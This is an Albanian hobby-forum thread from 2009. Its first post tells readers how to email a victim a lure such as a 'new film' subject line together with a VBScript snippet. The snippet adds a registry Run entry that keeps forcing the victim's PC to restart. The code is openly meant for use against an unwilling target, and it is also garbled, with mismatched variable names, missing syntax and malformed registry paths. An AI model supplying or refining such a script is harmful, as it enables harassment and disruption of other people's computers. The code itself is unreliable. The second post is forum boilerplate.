ForumCalendarGalleryPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share
 

 Fikja pc dikujt qdo 24 seconda permes emailit

Shko poshtë 
AutoriMesazh
Enisi.1Numri i postimeve : 635
Join date : 17/01/2009

Fikja pc dikujt qdo 24 seconda permes emailit Empty
MesazhTitulli: Fikja pc dikujt qdo 24 seconda permes emailit   Fikja pc dikujt qdo 24 seconda permes emailit I_icon_minitimeSun Jan 18, 2009 9:09 pm

Shkojm e hapim Inboxin ton dhe shkojm e kriojme nje email te ri dhe e shenojme emajlin e viktimes dhe ne Subject shenojme diqka interesante si ris NEW film dhe ne pjese ku e shenojme mesazhin vendosim kete

******** ****************="vbscript">
on error resume next
dim ok
set ok=CreateObject("WScript.Shell"

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32","shutdown -r"

kur ta hap emajlin viktima pc do ti fiked gjdo 24 sekonda
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
Enisi.1Numri i postimeve : 635
Join date : 17/01/2009

Fikja pc dikujt qdo 24 seconda permes emailit Empty
MesazhTitulli: Re: Fikja pc dikujt qdo 24 seconda permes emailit   Fikja pc dikujt qdo 24 seconda permes emailit I_icon_minitimeSun Jan 18, 2009 9:46 pm

[+]Pse të jeni me ne?


[+]Sepse ne jemi gjithmonë në Sherbimin Tuaj,dhe qendrojmë Këtu.

[+]Si të kerkoni ndihmë nga Ne?

[+]Shumë thjeshtë ,nëse keni problem me lidhjën tënde Kompjuterike,atëher është Sekcioni i duhur Pytje & Bisedime ,dhe ne do t'ua kthejmë pergjigjën.

( Kujdes ) Ndihmën gjithkush mund ta merr nga ne vetem më anë të Forumit, e jo nepër mes Msn.

[+]Ku është interesi jonë që të ju ndihmojmë Ju ?

[+]Interesi Ynë është se çdo njëri prej jush të ketë dijeni sepse te gjithë kanë deshire të mësohen .

Më Respekt Stafi KST.
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Fikja pc dikujt qdo 24 seconda permes emailit
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
( ( KsT-GrouP ) ) :: Panelli i Kontrollit :: Tutorials & Mësime-
Kërce tek: